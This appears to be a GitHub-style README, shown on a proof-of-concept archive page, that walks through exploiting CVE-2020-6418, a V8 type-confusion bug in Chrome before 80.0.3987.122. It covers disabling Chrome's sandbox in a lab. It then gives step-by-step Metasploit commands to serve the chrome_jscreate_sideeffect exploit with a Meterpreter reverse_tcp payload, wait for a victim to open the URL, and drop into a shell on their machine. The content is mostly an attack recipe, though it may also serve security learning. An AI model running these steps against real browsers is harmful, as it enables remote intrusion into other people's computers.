来源

关联漏洞

介绍

# CVE-2020-6418
The CVE 2020-6418 is about the the type confusion in V8 in Google chrome.The affected versions were prior to 80.0.3987.122. The vulnerability is achived by remote attacker accessing the shell of a target device via a crafted HTML page.

## Environment Requirements
1) Google Chrome with version prior to 80.0.3987.122 .
```
Note : The Google chrome browser should run with no sandbox for the exploit to be succesfull.
```
2) Metasploit Framework
3) OS : Any 

### Exploit Set Up
1) Google Chrome Version v80.0.3987.87  <br />
 https://www.neowin.net/news/google-chrome-800398787-offline-installer/
3) Windows v11
4) Kali Linux v2021.1

## Google Chrome Set-Up with no sandbox
i) Create a short-cut for Google chrome <br />
ii) Click on the properities > go to option called "Target" <br />
iii) At the end of EXE , give space and enter -no--sandbox <br />
iv) Click Apply > Ok <br />
v) Open new browser Google Chrome and you will find the pop-up stating the below.
```
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer

```
### Demonstration to Disable Sandbox
https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

## Using Metasploit
Since we are using Kali as an enviroment to carry out the exploit , metasploit comes as a built-in tool with the distro. But if you are using other distros we need to set up metaspolit before we begin the exploit.

Refer to the **Metasploit installation** for further understanding.

## Performing the exploit 
i) Starting metasploit framework
```
> msfconsole

```
ii) Find the exploit 

```
> search chrome_js

```
iii) Use the available exploit from the above output

```
> Use exploit/multi/browser/chrome_jscreate_sideeffect

```
iv) Provide SRVHOST IP address

```
> set SRVHOST <ip address>

```
v) Provide Target 
   Here we get two options 
   1) Target 0 : For Windows 
   2) Target 1 : For MAC
```
> set Target " Number "
```
vi) Provide Payload 
```
> set PAYLOAD windows/x64/meterpreter/reverse_tcp

```
vii) To check the current settings and options enabled.

```
> show options

```
viii) To run the exploit 

```
> run (or) > exploit

```
ix) You will be proivded with an URL , which should be copied on the browser for the session to get active.

x) Once the user accesses the URL , a session will be created. To check this 

```
> show sessions

```
xi) Using the session , we can check the user system info / enter the shell.
```
> sessions <number>
> shell

```
### Demonstration to exploit

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

文件快照

 [4.0K]  /data/pocs/7856a1c81756a37759b58c4c2bb791fb67a86908
├── [3.0K]  Explanation of vulnerability
├── [3.5K]  Metasploit framework.md
├── [ 910]  Patch Work Analysis.md
└── [2.6K]  README.md

0 directories, 4 files

备注